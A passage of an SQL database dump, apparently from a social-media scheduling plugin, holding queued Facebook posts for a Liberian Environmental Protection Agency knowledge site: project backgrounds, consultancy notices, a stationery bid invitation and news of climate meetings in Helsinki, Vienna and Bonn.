\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"Project Background\\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in\\ncollaboration with the Society for the Conservation of Nature of Liberia, received funding from the\\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to\\nimplement a five-year project titled \\u201cStrengthening Conservation and Effective Governance of\\nLiberia\\u2019s Critical Forests in the Northwest Liberia Landscape\\u201d. The project\\u2019s objective is to\\nenhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by\\npromoting integrated and inclusive management of intact forest landscapes, including protected\\nareas, and supporting collaborative transboundary watershed management through five components:\\n1: Establishment of proposed protected areas and promote the effective management of existing\\nprotected areas; 2: Promotion of innovative climate-resilient and conservation-friendly livelihoods\\nand enterprises; 3: Strengthening transboundary watershed and forest landscape management; 4:\\nCapacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\\nand Evaluation (M&E) Framework. For more information about the project\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/national-consultancy-to-develop-a-project-knowledge-management-and-communications-strategy\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-09 22:13:47',NULL,NULL,'2026-06-09 22:13:46','2026-06-09 22:13:47'),(13,'Terms of Reference (TOR)  National Consultancy to Develop a Project Operations Manual (POM)','{\"settings\":{\"name\":\"Terms of Reference (TOR)  National Consultancy to Develop a Project Operations Manual (POM)\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"Project Background\\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in collaboration with the Society for the Conservation of Nature of Liberia, received funding from the\\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to implement a five-year project titled \\u201cStrengthening Conservation and Effective Governance of\\nLiberia\\u2019s Critical Forests in the Northwest Liberia Landscape\\u201d.\\n\\nThe project\\u2019s objective is to enhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by promoting integrated and inclusive management of intact forest landscapes, including protected areas, and supporting collaborative transboundary watershed management through five components:\\n1: Establishment of proposed protected areas and promote the effective management of existing protected areas;\\n\\n2: Promotion of innovative climate-resilient and conservation-friendly livelihoods and enterprises;\\n\\n3: Strengthening transboundary watershed and forest landscape management;\\n\\n4:Capacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\\nand Evaluation (M&E) Framework.\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/terms-of-reference-tor-national-consultancy-to-develop-a-project-operations-manual-pom\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-09 22:22:53',NULL,NULL,'2026-06-09 22:22:52','2026-06-09 22:22:53'),(14,'Liberia Strengthens Pathway to Cleaner Transport Through Fuel Quality and Vehicle Emission Reforms','{\"settings\":{\"name\":\"Liberia Strengthens Pathway to Cleaner Transport Through Fuel Quality and Vehicle Emission Reforms\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"The Environmental Protection Agency (EPA) of Liberia has reaffirmed its commitment to transforming the country\\u2019s transport sector through the implementation and enforcement of cleaner fuel and vehicle emission standards aimed at improving air quality, protecting public health,\\n\\nand supporting national climate ambitions.\\n\\nAddressing participants at the National Dissemination Workshop on Promoting Cleaner Fuels and Vehicle Strategies in Liberia at the Royal Ambassador Hotel in Margibi County, the Deputy Executive Director for Administration, Hon. Anthony S. Kollie, underscored the growing environmental and health concerns associated with aging vehicles and poor fuel quality. He noted that the rapid expansion of Liberia\\u2019s vehicle fleet, coupled with the continued importation of high-emitting vehicles and fuels, presents significant challenges to the country\\u2019s sustainable development and climate objectives.\\n\\nSupported by the Climate and Clean Air Coalition (CCAC) and implemented with technical assistance from the United Nations Environment Programme (UNEP), the initiative has produced a comprehensive assessment of Liberia\\u2019s fuel quality and vehicle efficiency landscape. The assessment provides critical evidence and strategic recommendations to guide policy reforms, strengthen regulatory frameworks, enhance compliance monitoring and support the adoption of cleaner transport solutions nationwide.\\n\\nHon. Kollie emphasized that the EPA will work closely with key government institutions, private sector actors, transport unions, civil society organizations and development partners to ensure that the findings are translated into practical and enforceable measures. These efforts will include public awareness campaigns, institutional capacity strengthening, stakeholder engagement, and robust enforcement mechanisms to curb the importation and use of substandard fuels and vehicles.\\n\\nThe workshop marked a pivotal step in Liberia\\u2019s transition toward a cleaner, more efficient and climate-resilient transport sector; one that advances sustainable mobility, reduces harmful emissions and contributes meaningfully to the country\\u2019s Nationally Determined Contribution (NDC) targets by 2035.\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"719160126_1505325871636667_850325227837403501_n.jpg\",\"uid\":5946,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/06\\/719160126_1505325871636667_850325227837403501_n.jpg\"},{\"name\":\"718014503_1505325968303324_8087690081882678858_n.jpg\",\"uid\":5948,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/06\\/718014503_1505325968303324_8087690081882678858_n.jpg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-09 22:34:22',NULL,NULL,'2026-06-09 22:34:21','2026-06-09 22:34:22'),(18,'Liberia Represented at Global UNEP Training on Critical Minerals and Environmental Agreements','{\"settings\":{\"name\":\"Liberia Represented at Global UNEP Training on Critical Minerals and Environmental Agreements\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"HELSINKI, Finland (June 10, 2026) \\u2013 Liberia was among countries represented at a major international training programme focused on the future of critical energy transition minerals and environmental governance, with Arthur R.M. Becker serving as the country\'s delegate.\\n\\nMr. Becker, Director of the Department of Multilateral Environmental Agreements at the Environmental Protection Agency of Liberia, participated in the 20th University of Eastern Finland\\u2013United Nations Environment Programme Course on Multilateral Environmental Agreements, which concluded in Helsinki on Tuesday, June 9, 2026.\\n\\nThe programme brought together 25 participants from various parts of the world to discuss emerging environmental challenges linked to the increasing demand for critical minerals needed to power the global clean energy transition.\\n\\nDuring the course, participants examined issues ranging from environmental protection and sustainable mining practices to international cooperation and the implementation of environmental agreements.\\n\\nMr. Becker\'s participation provided Liberia with a platform to contribute to discussions on global environmental governance while gaining insights into international best practices and policy developments.\\n\\nThe training further emphasized the importance of strengthening national institutions and enhancing cooperation among countries to ensure that the extraction and use of critical minerals support sustainable development objectives.\\n\\nAs the world accelerates efforts to reduce carbon emissions and expand renewable energy technologies, experts at the programme stressed the need for responsible management of mineral resources to prevent environmental degradation and promote long-term sustainability.\\n\\nParticipants at the training reaffirmed the importance of multilateral cooperation in addressing complex environmental challenges and advancing a sustainable global energy transition.\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"neww1.jpeg\",\"uid\":5962,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/06\\/neww1.jpeg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-17 02:47:11',NULL,NULL,'2026-06-17 02:47:10','2026-06-17 02:47:11'),(19,'Liberia Strengthens Global Climate Partnerships Through Vienna Talks with UNIDO','{\"settings\":{\"name\":\"Liberia Strengthens Global Climate Partnerships Through Vienna Talks with UNIDO\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"VIENNA, AUSTRIA, June 15, 2026\\u2013 As Liberia continues to position itself at the forefront of climate action and sustainable development efforts, three senior officials from the Environmental Protection Agency (EPA) of Liberia are participating in a strategic three-day engagement with the United Nations Industrial Development Organization (UNIDO) in Vienna, Austria.\\nHeld at the renowned Vienna International Centre, the meeting marks an important step in deepening cooperation between Liberia and UNIDO on issues ranging from climate resilience and environmental governance to sustainable industrial development.\\nLeading the EPA delegation are Arthur R.M. Becker, Director of Multilateral Environmental Agreements (MEAs); Z. Elijah Whapoe, Coordinator of the National Climate Change Secretariat; and Desmond T. Thompson, Alternative Global Environment Facility (GEF) Operational Focal Point and Project Liaison Officer.\\nThe discussions are expected to pave the way for stronger partnerships, increased technical support, and greater opportunities for financing environmental and climate-related initiatives in Liberia.\\nAt a time when developing nations face growing climate pressures, Liberia is actively seeking partnerships that can help strengthen national capacity, promote green development, and support the country\'s commitments under international environmental agreements.\\nThe opening day of talks was described as highly productive, with both sides reaffirming their shared commitment to advancing climate action and sustainable development. The engagement also provides an opportunity for Liberian officials to exchange experiences, identify best practices, and explore innovative solutions that can support the country\'s environmental agenda.\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"to-news.jpg\",\"uid\":5965,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/06\\/to-news.jpg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-17 02:58:17',NULL,NULL,'2026-06-17 02:58:16','2026-06-17 02:58:17'),(20,'International Interest Grows in Liberia\'s Clean Smart Project Following High-Level SB64 Engagement','{\"settings\":{\"name\":\"International Interest Grows in Liberia\'s Clean Smart Project Following High-Level SB64 Engagement\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"BONN, Germany, June 16, 2026 \\u2013 Liberia\'s efforts to advance a sustainable and climate-resilient future gained significant international attention at SB64 as the Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel Urey Yarkpawolo, engaged in productive discussions with senior leaders of the UNFCCC\'s Sharm el-Sheikh Mitigation Ambition and Implementation Work Programme (MWP).\\nThe bilateral meeting with MWP Co-Chairs Angela Naneu Churie Kallhauge and Gao Xiang centered on opportunities to secure financial and institutional support for Liberia\'s Clean Smart Project, an ambitious initiative aimed at expanding renewable energy access and accelerating the country\'s transition toward a low-carbon economy.\\nThe discussions highlighted Liberia\'s growing profile within international climate circles and the country\'s commitment to implementing practical solutions that address energy poverty, create economic opportunities, and contribute to global emissions reduction efforts.\\nIn the meeting Tuesday, Dr. Yarkpawolo emphasized that Liberia remains committed to building partnerships that can unlock investment, innovation, and sustainable development opportunities for its people.\\nHe noted that the Clean Smart Project aligns with Liberia\'s broader vision of creating a cleaner, more productive, and resilient economy while contributing to international efforts to combat climate change.\\nMrs. Kallhauge praised Liberia\'s vision and commitment to climate action, describing the Clean Smart Project as a promising initiative with the potential to deliver meaningful environmental and developmental impacts.\\nShe expressed strong interest in supporting the project\'s advancement and pledged to help facilitate introductions to potential funding partners and stakeholders.\\nIn a notable show of confidence in Liberia\'s climate agenda, Ms. Kallhauge also expressed interest in visiting Liberia to engage directly with national stakeholders and explore opportunities for future collaboration.\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"time-news.jpg\",\"uid\":5968,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/06\\/time-news.jpg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-17 03:06:12',NULL,NULL,'2026-06-17 03:06:11','2026-06-17 03:06:12'),(17,'BIDDING DOCUMENTS NCB THE SUPPLY OF STATIONERIES IFB NO.BPS/EPA/CISRB/004/26','{\"settings\":{\"name\":\"BIDDING DOCUMENTS NCB THE SUPPLY OF STATIONERIES IFB NO.BPS\\/EPA\\/CISRB\\/004\\/26\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"NVITATION FOR BIDS\\n\\nSection I.\\n\\n                 (PROCUREMENT OF SUPPLY OF FURNITURE & FIXTURE)\\n\\n \\nContract Identification No.: IFB NO.BPS\\/EPA\\/CISRB\\/004\\/26\\n\\n The Government of the Republic of Liberia through the Environmental Protection Agency (EPA) has received Funds from African Development Bank (AfDB) for the implementation of the ENHANCING CLIMATE INFORMATION SYSYTEM FOR RESILIENCE DEVELOPMENT PROJECT and intends to apply part of the funds towards the procurement of SUPPLY OF STATIONERIES.\\n \\n\\nThe Environmental Protection Agency now invites sealed bids from eligible registered bidders for THE SUPPLY OF STATIONERIES.\\nBidding will be conducted through the Restricted Bidding process as specified in the Public Procurement & Concessions Commission Act (PPCA) of 2010.\\nSpecification & Quantity\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/bidding-documents-ncb-the-supply-of-stationeries-ifb-no-bps-epa-cisrb-004-26\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-16 17:04:58',NULL,NULL,'2026-06-16 17:04:57','2026-06-16 17:04:58'),(21,'Re post: Liberia Strengthens Global Climate Partnerships Through Vienna Talks with UNIDO','{\"settings\":{\"name\":\"Re post: Liberia Strengthens Global Climate Partnerships Through Vienna Talks with UNIDO\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"VIENNA, AUSTRIA, June 15, 2026\\u2013 As Liberia continues to position itself at the forefront of climate action and sustainable development efforts, three senior officials from the Environmental Protection Agency (EPA) of Liberia are participating in a strategic three-day engagement with the United Nations Industrial Development Organization (UNIDO) in Vienna, Austria.\\nHeld at the renowned Vienna International Centre, the meeting marks an important step in deepening cooperation between Liberia and UNIDO on issues ranging from climate resilience and environmental governance to sustainable industrial development.\\nLeading the EPA delegation are Arthur R.M. Becker, Director of Multilateral Environmental Agreements (MEAs); Z. Elijah Whapoe, Coordinator of the National Climate Change Secretariat; and Desmond T. Thompson, Alternative Global Environment Facility (GEF) Operational Focal Point and Project Liaison Officer.\\nThe discussions are expected to pave the way for stronger partnerships, increased technical support, and greater opportunities for financing environmental and climate-related initiatives in Liberia.\\nAt a time when developing nations face growing climate pressures, Liberia is actively seeking partnerships that can help strengthen national capacity, promote green development, and support the country\'s commitments under international environmental agreements.\\nThe opening day of talks was described as highly productive, with both sides reaffirming their shared commitment to advancing climate action and sustainable development. The engagement also provides an opportunity for Liberian officials to exchange experiences, identify best practices, and explore innovative solutions that can support the country\'s environmental agenda.\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"to-news.jpg\",\"uid\":5965,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/06\\/to-news.jpg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-17 03:13:54',NULL,NULL,'2026-06-17 03:13:53','2026-06-17 03:13:54'),(22,'CONSULTANCY: National Climate Change and Early Warning Expert','{\"settings\":{\"name\":\"CONSULTANCY: National Climate Change and Early Warning 